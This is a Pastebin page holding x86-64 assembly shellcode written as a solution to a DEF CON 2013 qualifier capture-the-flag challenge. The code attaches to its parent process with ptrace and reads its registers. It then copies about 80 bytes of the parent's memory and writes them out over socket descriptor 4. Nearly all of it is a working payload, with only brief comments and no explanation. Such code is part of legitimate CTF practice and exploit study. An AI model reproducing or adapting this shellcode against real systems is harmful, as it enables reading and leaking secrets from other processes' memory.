Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ;
- ; Defcon Quals 2013 - incest
- ;
- ; ptrace parent shellcode for sis
- ; by timhsu@chroot.org, June 2013
- BITS 64
- GLOBAL _start
- _start:
- jmp get_buf ;
- run:
- pop rsi
- push rsi ; save buffer address
- push rsi ; ptr = buffer
- xor rax, rax ; zero the registers
- xor rdi, rdi
- xor rdx, rdx
- xor rbx, rbx
- ; sys_getppid()
- add rax, 110
- syscall
- mov rsi, rax ; get ppid
- push rsi
- pop rbx ; save ppi dto rbx
- try_attach:
- ; sys_ptrace(request, pid, addr, data);
- ; rdi , rsi, rdx, r10
- xor rax, rax
- add rax, 101
- xor rdx, rdx
- ; PTRACE_ATTACH 16
- xor rdi, rdi
- add rdi, 16
- syscall
- ; wait4(pid, status, opt, rusage)
- ; rdi rsi rdx, r10
- try_wait:
- xor rax, rax
- ; NR_wait4 = 61
- add rax, 61
- mov rdi, rbx
- xor rsi, rsi
- xor rdx, rdx
- xor r10, r10
- syscall
- try_getregs:
- mov rsi, rbx ; get ppid
- xor rax, rax
- add rax, 101
- xor rdx, rdx
- ;
- ; PTRACE_GETREGS (rdi, rsi, rdx, r10);
- mov rdi, 12
- pop r10
- push r10
- syscall
- mov rdx, [r10+4*8] ; get rbp of parent(ppid)
- try_peektext:
- sub rdx, 0x18 ; from disasm sis,
- ; get buffer address of parent
- do_peektext:
- mov rsi, rbx ; get ppid
- call ptrace_peektext
- mov rdx, [r10] ; rdx = address
- mov rcx, 10 ; read 10 times
- again_peektext:
- ; PTRACE_PEEKTEXT again => loop for get more data
- mov rsi, rbx
- call ptrace_peektext
- add r10, 8 ; ptr+=8
- add rdx, 8 ; address+=8
- loop again_peektext
- dump:
- pop rsi ; ptr
- pop rsi ; buffer, to dump
- ; sys_write(stdout, buffer, length)
- xor rax, rax
- xor rdx, rdx
- add rax, 1 ; sys_write
- xor rdi, rdi
- add rdi, 4 ; socket = 4
- add rdx, 80 ; string length
- syscall
- ; sys_exit
- xor rax, rax
- add rax, 60 ; sys_exit
- syscall
- ptrace_peektext:
- ; ptrace(rdi, rsi, rdx, r10);
- ; PTRACE_PEEKDATA 0x2
- push rcx
- xor rax, rax
- xor rdi, rdi
- mov rax, 101
- mov rdi, 2
- syscall
- pop rcx
- ret
- get_buf:
- call run ; put address of buffer onto the stack
- buffer:
- db 'AAAAAAAAAA'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement